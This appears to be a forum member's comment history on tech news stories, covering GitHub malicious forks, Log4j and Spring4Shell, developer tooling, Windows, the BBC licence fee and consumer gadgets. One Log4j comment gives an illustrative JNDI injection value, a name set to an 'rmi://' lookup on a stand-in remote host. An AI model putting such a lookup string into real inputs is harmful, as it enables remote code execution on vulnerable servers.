* Posts by malfeasance

63 publicly visible posts • joined 1 Sep 2009


GitHub struggles to keep up with automated malicious forks


Attack Vector/Scope of the attack

I read the article on arstechnica and a few things didn't sit right with me.

1) The example shows python as the language, with the poisoned payloads being present in the source code of the projects

2) That implies to me, the attack vector is people used to stackoverflow that blindly copy and paste code into their own projects.

2.1) These projects don't seem be published into a public registry since they have the same name.

2.2) People dissing github for allowing them to use the same name aren't really on the money because a fork is a fork, and a fork inherits the same name and your "user-id / org" gives it a namespaced scope in github.

3) There is nothing of course to stop the bad actors from publishing to ghcr.io under their userid/org and then doing a poison supply chain attack.

3.1) If I need to publish to maven central then I need to jump through a couple of hoops before I'm allowed to publish to the "com.myorg" group; I'm guessing that PyPi or similar don't have such restrictions

I genuinely don't know what to think of this.

Can someone help me understand precisely how this is a bigger problem than Caveat Emptor if you're just cutting and pasting shit from the web? (which is a big problem, but a _people problem not a technology problem per se_ )

Microsoft embraces its inner penguin as sudo sneaks into Windows 11


I genuinely thought it already existed

Then I realised that I have it installed via scoop which resolves to this:


Former Post Office boss returns CBE to sender over computer system scandal


Re: A scandal of epic proportions

What's galling is that Computer Weekly (? I forget the name of the trade paper) & Private Eye both shone a light on the scandal repeatedly and it was brushed under the rug. Also, didn't Panorama also have an investigative show on it.

This is a punching problem; where the families of all those affected get to punch fujitsu & vennells repeatedly until we have a different type of problem. (Violence is not the answer of course, but money and exoneration isn't going to give any _real closure_ to some of those affected).

Microsoft touts Visual Studio Code as a Java juggernaut


So, I made the decision to move my dev environment 'into' WSL2 from NTFS (recently) because python, node, ruby are also things I'm working with as well as rust + java.

IntelliJ on Windows, for all its support for WSL2, didn't play nicely on my machine and essentially all gradle projects that are now in WSL2 break with a "can't find a main-class org.jetbrains.something.or.other.gradle.tooling.Proxy".. It was just meant to work according their docs; searching for the missing main class didn't give me much help either since I'm running the latest IntelliJ community edition.

I have moved to vscode (java+rust); running vscode with the WSL remote server or whatever is has been frictionless, and the java & rust projects 'just work' in the manner that I expect them to.

'yeah but, you could run WSL2 in Wayland mode, and install IntelliJ like that', or 'mutter some arcane invocation that magically has some kind of setting that makes it work'; I'm just fighting against the tooling by then, which stops me from getting actual shit done.

Linus Torvalds to kernel devs: Grow up and stop pulling all-nighters just before deadline


Re: Err

Sounds like you're reading into it as though Mr T is (already) having an apoplectic fit. That's not how I'm reading it, so we can agree to disagree about that.

He's given us fairly clear direction as to his expectations about the merge window; do it early so he has time to review code and understand the wider ramifications of it (if any). If we choose to still give him our merge requests in the way he finds disappointing (merge-window-close - 1) then we won't the best experience and shouldn't be surprised if things don't go our way.

Anyone vaguely related to a release process will have seen the pain of seeing someone commit a change on the release branch late in the day before go-live. It generally doesn't end well.


Re: Err

You have a merge window, and because you're a kernel dev you know when it's gonna start. You can submit your merge requests on (merge window start +1) or you submit your merge requests on (merge window close -1)

Which of these is going to get you the best experience out of your interaction with Mr T; he who has been known to pity the fool.

I don't think that what happens after the merge window closes is relevant to the point that Linus is making; "punctuality is the courtesy of kings" and all that.

Logitech Zone Vibe 125: Weightless comfort on the ears that won't break the bank


Re: Comfort?

Almost certainly alluding to the fact that their experience doesn't match his, and because of reasons, he must be wrong, because we are a homogenous lived experience now, big tech tells us so.

(I've already demonstrated that by referring to Charlie as a he, when I don't know them)

Headphone style is a weird one, the people that swear by over-ear headphones probably don't suffer from (or at least aren't bothered by it).

- Having to wear glasses like Charlie (and myself).

- Getting really hot ears from the over-earness of the headphones. Personally, I haven't found a pair of over-ear headphones that I can wear for longer than 30 minutes.

- On ears are better, but still not great

I get on with in-ears quite well, and from a "mobile headset" point of view I'm a big fan of the Bose QC earbuds, and the Sony WF-1000MX3 (or MX4) in-ears. 2 pairs because if you go on a flight longer than 6 hours...

However, from a usability point of view, earbuds are pointless in an office environment because the pickup from the mic broadcasts everything (by office environment, my home office is 2 person, and when you're both on calls it doesn't end well).

If it's purely for remote working then I would go for the aeroshokz/aftershokz opencomm, bone conductors with mic.

It's in the same price range as these, I can wear them all day, I can hear the doorbell when the postman comes, and for me, the mic is on the correct side of my face (I sit to the right, which means the mic hanging off the left ear makes a difference in sound pickup)

Back-to-office mandates won't work, says Salesforce's Benioff


Because ultimately you are paying for skills. The company is effectively leasing the knowledge that you have in order to do the job that they need doing.

If you want someone for 30k from Elbonia, by all means go and get them; but what's the opportunity cose to the business by doing that.

I don't believe that programmers are fungible, that's a whole load of nuance that would need quantifying before you can go down the "programmers are interchangeable cogs in a production line" (which is the ultimate expression of what you've said).

It's our own fault that we liken development/programming as though it were a production line; that's never truly been the case.

Patch now: RCE Spring4shell hits Java Spring framework


Re: Whose?

To quote some analysis about this CVE (veracode) you need to be using

Spring Web MVC or Spring Webflux projects AND

Spring Framework version 5.3.x prior to 5.3.18, and all versions prior to 5.2.20 AND

Java 1.9 or above AND

Deployed on Tomcat App Server as a WAR AND

Spring Web MVC with parameter binding (enabled by default) AND

Don’t have an allowlist of HTTP fields registered to be allowed or explicitly disallow fields which could cause malicious intent.

The interaction between all those components are unlikely to be covered by a unit test, so it's somewhat disingenuous to mention it. It would have to be an integration test that needed to be done by the Spring team using things that are outside of their control.

I would note here that if you're a vanilla spring-boot user then you're not vulnerable to this partcular RCE.

Apache takes off, nukes insecure feature at the heart of Log4j from orbit with v2.16



There's always a problem with being able to lookup serialized binary objects across a network. Yes, JNDI RCE is a problem, because it's little bobby tables, so the application needs to do verification of user input just like always.

8u191+ disabled by default the ability to inject classes (e.g. I don't have the class this object refers to, could you give it to me?). However, it is still possible to achieve the same thing if you have a class that's vulnerable already on the classpath.


I mean the obvious example is going to be a lookup via LDAP for my identity, if I were to change my name to "rmi://example.com:10977/dodgy" and the login page ended up calling InitialContext.lookup with my dodgy name (and the server was allowed to open up external connections...)

Log4j doesn't just blow a hole in your servers, it's reopening that can of worms: Is Big Biz exploiting open source?


Re: JNDI concerns

And yet they have done it with extreme prejudice haven't they, they've taken option-b and rightly so, but the decision to enable it by default is basically down to the Apache committer.

If you look at the log4j jira and search for the original ticket (https://issues.apache.org/jira/browse/LOG4J2-313); the use-case seems reasonable on the face of it. With hindsight "we can all say, there's no way that's secure, don't be soft!". But, think about the sea change in security perspective in the intervening 8 years. How many of us employed by corporates have now been on mandatory secure-by-design training. If you've been with the same company for a while, when did the powers-that-be mandate it? (I suspect it was post equifax...)

Developers are ultimately lazy and haven't been forced to have the discipline to consider all the side-effects of their changes on the entire system.

To take a case in point, the javax package move to jakarta is one that irks me, because they've broken backwards compatibility in a completely nonsensical way. jakarta.mail.jar contains some "com.sun.mail" packages in situ, but have renamed all the javax.mail -> jakarta.mail. There's a circular dependency in one of the classes (a com.sun.mail class now takes a jakarta.mail class; this conflicts the same class that might have been provided by javamail-api.jar, because method signatures right)

They committed the change, the unit tests passed, so they released jakarta.mail-2.0.0, because the unit tests passed 100% code coverage. It's all good.

There are a lot of things out that that still depend on javax.mail.*, but this means that you can't include javamail-api-1.6.2.jar and jakarta.mail-2.0.1.jar in your classpath. Backwards compatibility is now broken irretrievably; there will be projects that pull an open source library that is orphaned (but serves its purpose) that depends on javax.mail (because javax.mail.mime isn't awful) and they can't upgrade to jakarta.mail to take advantage of security updates because they need working software.


Re: JNDI concerns

Enabling it by default was a choice made in a kinder gentler age. That was the decision, turns out it was a poor decision viewed with the prism of what we know now.

Once something is "in production" then backwards compatibility should be a goal. Breaking users expectations isn't something that should be done lightly which means that the status quo and inertia are quite a big anchor.

Microsoft releases command-line package manager for Windows (there are snags)



I’ve always found scoop.sh to be more useful than chocolatey.

Malwarebytes says its Office 365, Azure tenancies invaded by SolarWinds hackers, insists its tools are still safe to use


Depends on the documentation

There might be perfectly reasonable design decisions as to why Microsoft did that. Equally there might not be (Microsoft aren't going to tell us either way are they).

If you have documented prominently that "anyone can gain access to AD as a domain admin by doing this. If you want to stop that then do this this, and this. This has the known side effect of causing this behaviour..."

Isn't that documented well enough (if prominent enough) such that the customer can make a judgement call about it? Everything's a trade-off isn't it, and I presume that MalwareBytes made that trade-off...

Linus Torvalds rates his own words 'incoherent ramblings of a crazy old man'


Re: His classes are working

I don't think it's the classes.

Linus historically (been | appeared) the type of person that can admit when he's wrong. It's just that he's not often wrong in the things that he's the subject matter expert in (you know, like the kernel). I think there's a phrase "Strong opinions, weakly held" that could be used to describe him.

Even with a 49% uplift in sales and a 46% drop in expenses, Slack still can't turn a profit


Re: No need for Slack

The one thing that slack had over ms teams for a while, was the fact I could "join different organisations" slack workspaces in the same UI instance;

That wasn't great in teams, possibly still isn't, but I haven't needed to use it in anger recently.

Anecdotal evidence shows me that slack really suffers in the context of "it doesn't behave well with other applications; my other half is always complaining that slack sucks her CPU (5-10 different workspaces) and bandwidth.

How generous of GitHub to slash prices and make all its core features free. So what gives? Oh right, GitLab


It's might hurt bitbucket more.

I'm in the "lovely" position of using github (for opensource), gitlab (on-prem hosted), bitbucket (because we were using this before we were acquired, paid-for-private stuffs); oh, and some of the stuff on github is mirrored into gitlab.com.

We were all about (pre-acquisition) "use my own infrastructure" for doing the CI/CD; whether that's circleci/appveyor/travis-ci/ my very own jenkins or whatever. In fact I have circle-ci/appveyor/github-actions/travis-ci setup for most of our opensource projects to at least run tests: mainly because we can, but also because using multiple pipelines mean that when we have intermittent network-y style failures we can eyeball the PR and still approve it. If 3 out of 4 work, then it's probably an isolated problem that will eventually go-away... if none of them work, then we know it's a regression..

The org itself is in the process of standardising on gitlab on-prem; which means that we were going to move bitbucket into gitlab on prem; but now, we probably won't bother, we'll just move all the existing BB repos into github as private repos, since the opensource stuff will have to live somewhere...

Atlassian can't ignore github or gitlab, so jira/trello will always almost certainly have connectors for them; bitbucket may end up becoming unloved.

Microsoft attempts to up its Teams game with new features while locked-down folk flock to rival Zoom... warts and all


Re: More than four concurrent videos

I regard Teams as primarily a business tool; my line in the sand would be: If you have > 4 people in a meeting, it's not a meeting anymore; it's just a hot-air balloon being inflated.

Sure; I get that stuff is nuanced, but for most business use cases, Teams will work fine (as will any of the other tools).

I've worked remotely for nigh on 20 years, and after the novelty of it all; it's all about asynchronous communications; it's all about being precise in your communications (bearing in mind all the the filler words that english has and how useless they are, relatively speaking - look I've used a bunch in typing this comment).

It's nice to have a choice isn't it?

Hapless AWS engineer spilled passwords, keys, confidential internal training info, customer messages on public GitHub


so-called engineers that don't understand the tools they use

You're bang on, seen that so many times; which is confusing since you can easily have an excludes file in your ~/.gitignore a-la


excludesfile = /home/user/globals/gitignore

And then in that gitignore file have a "__localonly" line; this means, doesn't matter what project I'm working on, I create a __localonly directory and stuff all the hard-coded nonsense in there.

Never gets checked in, never gets pushed, doesn't ruin anyone elses pristine filesystem...

Female-free speaker list causes PHP show to collapse when diversity-oriented devs jump ship


Isn't this just the market deciding?

I have no idea how good PHP.CE was/is as a conference; but they've organised speakers; and some of those speakers have pulled out.

As a result of those speakers pulling out, ticket sales dried up (which obviously tells us something); and it's no longer viable as an entity.

Thus the market hath spoken... (and the market might be wrong, but it hath spoken).

Bordeaux-no! Wine guzzling at UK.gov events rises 20%


Re: Canada?

Yes, Ice Wine. Might not be your bag if you don't like dessert wine, but it's a wine; some think it's fine.

Perfect timing for a two-bank TITSUP: Totally Inexcusable They've Stuffed Up Payday


The last friday of the month

Is generally payday; so yeah, this is aggravating on a lot of levels for a lot of people

Now, I am not trying to defend HSBC; but isn't this the "first" that HSBC mobile/web banking has gone away for an extended amount of time, which if you regard the time difference between the twitter post 0749 and the first PR response 0830; let's give it at least a couple of hours before PR spin is actually true; then a reasonable expectation is that by 1100 we're in a vaguely working state That isn't awful...

I know that collectively we are impatient and we want to know what we want to know right now; but it's a bit like the "looking at the finger pointing at the moon".

I have accounts with most of the high street operators; HSBC isn't the even close to the most unreliable of them; mind you, I am not of the ilk that wants to manage all my accounts on my phone whenever the whim takes me (seriously, why have the temptation to make a payment when you're down the boozer setting sail for shores unknown). Set a IFTTT to remind you to pay the man, when you walk within 50metres of your house...

Linux kernel's 'seat warmer' drops 4.19-rc5 with – wow – little drama


The road to hell...

is paved with good intentions is probably the epithet that springs to mind; or if we can go straight for a godwin-esque reference, that poem by that pastor niemuller?

The western world is quite male, pale and stale (I only fit 2 of that criteria); and from a purely objective and rational standpoint, what some of the code-of-conduct stuffs tries to do is quite worthy. But then as soon as people get involved it gets into a right old mess of prejudice and bias and we end up giving airtime/attention to the loudest shoutiest peopl.

If the GPLv2 developer consent killswitch does apply; then surely the answer is to fork RC4 *right now* (however that needs to be done); and then you have a copy that you're free to have "people who are now persona-non-grata" contribute to it. You can probably even merge the mainline kernel yourself w/o too much trouble[1].

[1] - If you can't then should you even be worrying about the CoC; there's not an awful lot you can do. You'll just have to trust that the kernel remains "good enough" even with the thought police on every corner.

Extract, transform, load? More like extremely tough to load, amirite?


Re: Eh?

Sure, but the software provided by one of the data integration vendors could work in both an ETL way, and an app integration way. You're then using the same piece of software to achieve 2 very different end-goals with presumably some level of improved supportability/providing more business value. If that's good enough; then excellent. If not, then that's fine too.

Saying that ETL/App integration are instrisnically a different class of problem to each other doesn't seem right, but then I'm just a programmer.


Re: Eh?

I think the point that Trevor is making that whether it's ETL, or API integration, it's just data integration (though I liked the repurposing of the EDI acronym).

You configure Jira to push its updates to a URL, the listener on that URL takes the Jira JSON data and turns it into a MS Teams MessageCard, and posts it to one or more MS Teams endpoint; what is happening behind the scenes, an extract, a transform, and a load. In this case sure, the extract is a push, but it's not beyond the wit of man to change that listening so that it polls a URL on a schedule etc. etc.

Apple, if you want to win in education, look at what sucks about iPads


@Ralph76 - Surface Pro is a domain aware tablet...

Erm, it's called a surface pro; it is exactly what you asked for, a domain aware tablet with a keyboard... It's just very pricey and thus not an option for the state system sadly.

The school (It's an fee-paying school, goes from 5-18; Surface Pro use starts at Yr 5 (~9/10) my daughter goes to has mandated surface pros; along with the whole Office 365 buy-in. Having seen how they're using OneNote and all of that to distribute homework it is a big step forward in terms of managing that aspect of schoolwork.

They use the stylus to annotate the notes / material, and to do the homework; homework is auto-synced, and just "done". The STEM subjects all use the technology quite well I think. The artsy subjects not so much but submission for homework can always be electronic at least.

Installed Python for CS - I did ask the CS teacher if we could just use the ubuntu WSL but she specifically wanted Python 3.6 (I know I can get it on the ubuntu WSL, but there is probably no point being that annoying for the sake of it).

I have issues with how the IT guys have set it up (badly); but overall the decision on surfaces is a darn sight better than the previously announced (but never followed through) mandate to use ipads. The expected lifetime of the surface pro is ~4 yrs.

Stack Overflow + Salary Calculator = your worth


Unrealistic. Of course.

What are your motivations for doing Dev. If it's money then I would venture to suggest youre in the wrong job.

If it's to work on interesting problems with the people who think like you and make it fun. Then rock on youre in my team (My corporate will burn you but I still want to work with you).

Five ways Apple can fix the iPhone, but won't



How about stopping apps/javascript from pausing/muting the music / podcasts app.

Commuting and listening to some 'weird shit jazz'; happen to goto the guardian home page. Oh look the tunes are paused cos you have some shitty video you might want to play.

At least a pop-up to say. You know what, this website has media. Yes/no? Searched thru safari settings and nothing obvious.

Continuous integration platforms are broken – here's what needs fixing


CI is just software development in disguise

CI accrues technical debt just like any software development exercise; you made a choice to do things one way, it turns out less optimal than you wanted, so you either gaffer tape it or you rewrite...

We have a situation where we're building our application + modules as rpms; base.rpm + opt-a.rpm + opt-b.rpm and so on. So you can just install all the stuffs with our custom yum repos via puppet etc.

It's working quite well with their initial use case; and it's a hell of a lot better than what they had before (i.e. no CI at all)...

However, what the CI people haven't quite grasped is that opt-a.rpm might have conflicting dependencies with opt-b.rpm; it's entirely possible that if we need to install base + opt-a + opt-b, it might not work because we're in still in package dependency hell (and thus was it ever like this, with DLLs, jar files etc).

The pragmatist in me wanted the CI to happen, what we have is better than what went before; but now they have got their toes wet, we all need to revisit the solution and sort out the technical debt.

Fat chance of that and so the story goes on...

Anti-TV Licensing petition gets May date for Parliament debate


For the public good

The question is really : is a public broadcaster like the BBC considered a public good. If it is then we should pay for it. Much like we pay for schools, the NHS etc. Plenty of people have no kids and still pay for schools because they know it serves a greater good.

Do I think that the BBC is worth paying for absolutely yes. The Aussie state broadcaster is fucking awful as is the Irish one.

What do I get from something like 'In our time'. Nothing; but something like it needs to exist.

Two words, Mozilla: SPEED! NOW! Quit fiddling and get serious


Re: Firefox unloved by mozilla


Printing - when everything else can do it, and FF can't; rightly or wrongly; I'm going to blame FF. Life is too short to try and investigate that kind of misbehaviour, I'll just use another browser, login to a.n. site, and print my order conf.

Proxy networking : If I lock things down so that nothing is allowed to make 80/443 connections bar the proxy, FF *cannot browse the web*. Edge can, as can Chrome (as this also has use system-proxy settings checked).

I have to physically check the "auto-detect proxy settings for this network"; at which point it goes through the wpad resolution chain - I can see this from the DNS logs...

The configuration of my dhcpd instance appears correct; after all everything else works correctly; it's just FF.


Firefox unloved by mozilla

Firefox is still my main browser out of habit rather than anything else if I'm being honest. I swap between all three browsers (edge/chrome/ff) depending on what I'm doing.

I'd agree with others that firefox is unloved by mozilla. The two most common gotchas that I'm hitting constantly are :

1) FF cannot print on Windows 10 x64 pro. Chrome can, Edge can. That's all 3 printers that I have configured, 'a real printer', 'MS print to PDF', 'MS print to OneNote'. Just WTF!

2) FF cannot use "system proxy settings" : I have a proxy that is defined by the dhcp server using the wpad directive. Does FF use it ? nooo, I have to switch to "auto-discover proxy" or some shit which is just plain daft when everything else manages to find "http://proxy.malfeasance.towers/proxy.pac" correctly.

Admittedly all the mobile devices suck with proxy detection; windows phones just "work" surprisingly without any wifi network settings modifications.

New PayPal T&Cs prevents sellers trash-talking PayPal


Re: Ummmm...

The Mrs suggests go cardless or stripe as your payment processor. Anything is better than the foetid pile of ordure that is PayPal

Android Wear: The bloatware that turned into gloatware


Vector smartwatch

Fitbit bought vector in Jan sadly. These guys would have been your new smartwatch provider. 30 day battery at least. Notifications. Music. Activity tracker of sorts.

Nice looking timepiece; as in looks like a watch not some plastic tat.

Even windows mobile compatible for the 10 people still with lumias.

'F*cking crap' aside, Linus Torvalds says Linux 4.9 is coming along nicely



Isn't that primarily the Docker union FS thing?

Which given Docker's exemplary support for backwards compatibility; I'm not entirely surprised that Linus has gone off on one.

Microsoft Surface Book: Shiny slab with a Rottweiler grip on itself


Re: The Dance while you wait to get permission to remove a drive/device


I suspect you have some kind of indexing / search turned on for your USB drives; so windows probably isn't wrong, just you have no idea what is using the drive.

My boss gets this whenever he doesn't turn off spotlight (mac) for USB keys; he's made a few of mine "not well" even though he says he always clicks the eject button.

Kaspersky says air-gap industrial systems: why not baby monitors, too?


Re: Connection nagging

Happens all the time. I have "mobile data" turned off for all non-essential apps on my iPhone (it's enabled for the web-browser, mail and probably the Maps app).

So, if I'm not connected to WIFI then often this kind of thing happens :

1) Start the music app (the built in apple one; nothing fancy).

2) A big notification that you have to OK / CANCEL : Mobile data is not enabled for this application (you can't use the app until you dismiss the notification)

3) Spot of name calling as to why a fucking music app needs access to the intertubes (yes I know it's to encourage me to buy tunes from the store; who in their right mind would do that over 3G ???).

Microsoft's Surface 3 is sweet – but I wouldn't tickle my nads with it


Re: Why Why I always asked myself for Surface

I have a surface 3 pro; and while I don't love it, it is a tool I use most days (I'm a dev by trade). I probably could have bought a surface 3 given my use-case.

1) It's lighter than my laptop (so going to visit customers is generally easier).

2) It is a duplicate of my laptop when it comes to source code / git / mercurial etc. My whole build environment is available.

3) It works adequately on my lap (in front of the TV style; if I need to do work, then yes, I'm the type that goes and sits at a desk). The type cover is pretty good to type on.

4) Wireless Display Adapter (though this isn't necessarily limited to having to use a Surface) for presentations...

5) The pen is excellent for taking notes, and (if you have trained it) then converting handwriting into text.

6) "Signing PDF NDA" without having to print the damn thing (yeah, this is a marginal use case).

7) While not exactly cheap; it's comparable to the price of a decent ultrabook (I spec'd out a 8gb/256SSD at the time)

The furore over the Win7 interface vs Windows 8 does bemuse me; The difference between the interface has never bothered me; I find the start menu navigate to "programs" the slowest way to start a program; I've used launchy since ~2011 so I just use that, I haven't touched a start button since then. Metro has it's uses as well; though I tend to end up on the desktop because cygwin / putty.

Brute force box lets researchers, Cops, pop iDevice locks


@Phildude Re: So just switch to a strong password that's just numbers?

iOS devices only mentioned. But if we were to consider Android; if I enable "a passphrase" and I only use a numeric password; what does it present you with. If it's a full keyboard, then in this regard, iOS has it "correct for my usage model" (got fat fingers see, and a numeric keypad is better for that...).

Also, the article mentions that the brute force flaw bypasses the rate limiting and wipe device settings; I have my iPhone set to "wipe" after 10 attempts... By the time I got to the 7th or 8th failed attempt I was waiting ~2hrs for the next attempt (I tested this myself); so the back off delay you mention is already there and has been bypassed through use of this flaw.


So just switch to a strong password that's just numbers?

I've never understood why people go for a simple "PIN" unlock when it's just easy to have a strong password that's just numbers.

You still get a number pad; but there's no restriction on length. It's just as easy to use as the PIN unlock.

It can still be 4 characters if you want (but the 17hour brute force means you should reconsider that).

The BBC wants to slap a TAX on EVERYONE in BLIGHTY


Everyone in the UK consumes BBC output.

Everyone partakes of BBC output; those of you that say "i'll just watch it on catchup/another channel" are missing the point; if we didn't pay for the BBC, then in all likelihood that program would never have been commissioned. In some respects, the BBC license fee is worth it just for the David Attenborough stuff, or perhaps In Our Time.

By having a stable income stream, the BBC should be able to take risks and make TV might be worth watching and serve a public good. Yes, I wish that they wouldn't put so much stuff I don't like like Eastenders, Strictly and all that other tired nonsense; we can argue that it isn't taking risks and creating worthwhile TV, but that would be to conflate 2 separate arguments.

If you go down the road of "I don't use it, so I don't want to pay for it", then you'll end up with the situation where a 22-50yr old doesn't have to pay for the NHS (because they're very unlikely to use it); ditto the childless with the NHS / Education and all that other stuff that we all know we should contribute to; and besides have you seen the crap that's on ABC (aussie)...

Think of it like the James Webb Space Telescope; it's been in "development" for about 20 years now, and isn't going to get launched for another 3-5... If NASA didn't have a steady income it would never have been able to plan and execute on a 25 year schedule.

UPGRADE your CHILDREN with KANO: All you need in one box


Re: I thought this was going to come with

Also kickstarter; with a t-shirt. It is self assembly, in the sense that my 6 year old snapped together all the parts; lego style.

When we opened the box, I had to tell her how to hold the mobo, and how to plug in all the bits (picture instructions in the book). It was all her though.

The OS that's shipped auto-boots into a desktop that is geared towards the young'uns, you get pong (http://pong.kano.me), snake, a minecraft learning game (this appeared to cause a reboot on our PI, suspect overheating), and a couple of other bits and bobs that we haven't got round to.

It's a bit overwhelming plugged into our living room TV, so I may have to plug it into one of the spare monitors (this is just a distance from screen/size of text thing).

Scottish independence debate: STV player flops under weight of viewers


Re: Std Dirty tricks by tory boys of the westminster clan

Right... If in doubt suspect a conspiracy. Isn't it always the case that for these new-fangled-debate things each of the broadcasters gets a bite of the cherry? Last night was ITV (STV as the franchise owner), in a couple of weeks BBC will have a go.

Given that the current bunch of numpties can't do anything very well; a conspiracy wouldn't be my first choice.

If you're a so-called cybernat, then do kindly go away.

Top Ten 802.11ac routers: Time for a Wi-Fi makeover?


ADSL, VDSL built in / requires modem

More info required; it's all well and good you're testing the wireless speeds, but surely one of the other considerations is if the model is an ADSL / VDSL / Requires a cable/vdsl modem.

Hard to tell without going to each and every manufacturer page, (fritzbox, buffalo, tp-link excepted).

Perhaps just a quick comparison table at the end rather than showing us the somewhat pointless "user-interface" screenshots.

Personally I don't care much about the snazziness of the UI, but maybe I'd like to know know if I can have more than 1 wireless LAN with different network settings hosted on the same unit.

ARG! A GHOST SHIP! Pirates sunk by UK cops return from watery grave


Pointless DNS removal

We all know that there are are other torrentz TLDs; why did they even bother?

Try the switzerland or the montenegro tld; both work instead of the .eu TLD

Yeah, I know it's largely a rhetorical question, they must be seen to do something, anything, to appease their copyright masters.

Good news: 'password' is no longer the #1 sesame opener, now it's '123456'


echo -n $1 | md5sum | xxd -r -p | base64 | cut -c1-10

Choose a celebrity that's died recently, a song lyric, favourite poem. Done.

For non-important websites (like this one), forums, twitter, whatnot. My password is a dictionary word, with this applied. Easy to remember; I don't check websites unless I'm on a trusted machine...

Rotten hackers feast on mouldy Java flaws


Java isn't secure, but then nothing ever is.

Let's be honest now, the only vulnerable system with java installed is one that has the public JRE runtime (which I think will install the browser plugin) installed.

I have java installed (after all i am a java developer); and with *just the JDK* installed, and no browser plugins, there isn't an attack vector other than programs that I explicitly download and run (there will be no getting around my stupidity).

So the question isn't that java is "insecure"; it is, but then so's every complex computer program that's even been written; the problem is the *shit* that Oracle chooses to bundle with it and how Oracle chooses to deal with that...

Bill Gates offends Koreans after sticking hand down trousers


Re: Quite

Hmm, it's not really that apparent you know, cultural and social norms will have an impact on how the language is used.

If you want to take a transaction in a coffee shop as an example, all the Americans that I know and socialise with would say something like "Coffee thanks", whereas the Brits would say "Coffee please"; in cantonese I would say: "Coffee, thank you".

So, it may seem to a Brit, the yank isn't being polite, but he is, he just doesn't use the word please; nor do the cantonese (I've personally never used "please" when I speak cantonese, I'm not even sure there is a word that fits that concept).

From the point of view of transactional efficiency, it's actually far more efficient for you to say thank-you beforehand, rather than to say please, and then waste time saying thank-you afterwards...